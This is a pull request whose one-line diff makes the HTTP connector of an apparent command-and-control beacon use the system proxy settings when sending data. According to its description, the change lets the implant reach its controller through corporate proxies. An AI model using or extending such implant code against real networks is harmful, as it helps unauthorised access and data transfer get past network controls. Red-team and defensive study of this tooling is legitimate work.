### PR TITLE
Proxy Aware

### DIFF
--- a/Extenders/agent_beacon/src_beacon/beacon/ConnectorHTTP.cpp
+++ b/Extenders/agent_beacon/src_beacon/beacon/ConnectorHTTP.cpp
@@ -134,7 +134,7 @@ void ConnectorHTTP::SendData(BYTE* data, ULONG data_size)
 		DWORD dwError = 0;
 
 		if (!this->hInternet)
-			this->hInternet = this->functions->InternetOpenA( this->user_agent, INTERNET_OPEN_TYPE_DIRECT, NULL, NULL, 0 );
+			this->hInternet = this->functions->InternetOpenA( this->user_agent, INTERNET_OPEN_TYPE_PRECONFIG, NULL, NULL, 0 );
 		if ( this->hInternet ) {
 
 			if ( !this->hConnect )


### PR DESCRIPTION
This quick fix modifies the behavior of the `InternetOpenA` call to enable proxy autoconfiguration by changing the access type from `INTERNET_OPEN_TYPE_DIRECT` to `INTERNET_OPEN_TYPE_PRECONFIG`.
This change ensures that the agent becomes proxy-aware, which improves compatibility in environments where internet access requires going through a corporate or network-defined proxy.